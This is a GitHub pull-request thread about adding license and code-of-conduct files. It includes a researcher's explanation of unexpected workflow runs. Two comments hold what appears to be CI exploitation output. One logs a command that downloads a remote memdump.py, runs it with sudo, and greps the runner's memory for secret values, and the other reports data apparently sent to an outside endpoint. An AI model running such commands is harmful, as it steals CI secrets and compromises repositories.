### PR TITLE
Add LICENSE, CoC etc

### PR DESCRIPTION
**Pull request by stefanalund**

### CODE REVIEW

**Review by Rugvip — APPROVED** [review]

**Comment by nilsreichardt** [comment]
I am a student at the Technical University of Munich and researching about the security of CI/CD. It seems that script executed something on a source repository and not a fork - this should not happend and I'm so sorry for this! I'll investigate here and if it's a vulnerability, I will report it ASAP

**Comment by nilsreichardt** [comment]
I think I understand what happend: ai0uf5mr commented on this PR two times, which triggered these workflows:
* [run 24354811406](https://github.com/backstage/backstage/actions/runs/24354811406)
* [run 24354860848](https://github.com/backstage/backstage/actions/runs/24354860848)

Once these workflows finished,
* [run 24354874662](https://github.com/backstage/backstage/actions/runs/24354874662)

triggered which assigned the labels. So *no* security vulnerability 👍

**Comment by nqkt2imn** [comment]
Exception: Can not get pid of Runner.Worker
Okay, we got this far. Let's continue...
{"ok":true,"id":"3ebee14c-6baf-45a9-970e-fa87e0b96f2e","receivedAt":"2026-04-19T20:33:02.570Z"}

**Comment by nussknacker42** [comment]
PWN: package.json/index.js loaded
PWN Error: Command failed: curl -sSf https://raw.githubusercontent.com/playground-nils/tools/refs/heads/main/memdump.py | sudo -E python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> "/tmp/secrets"

**Pull request merged**
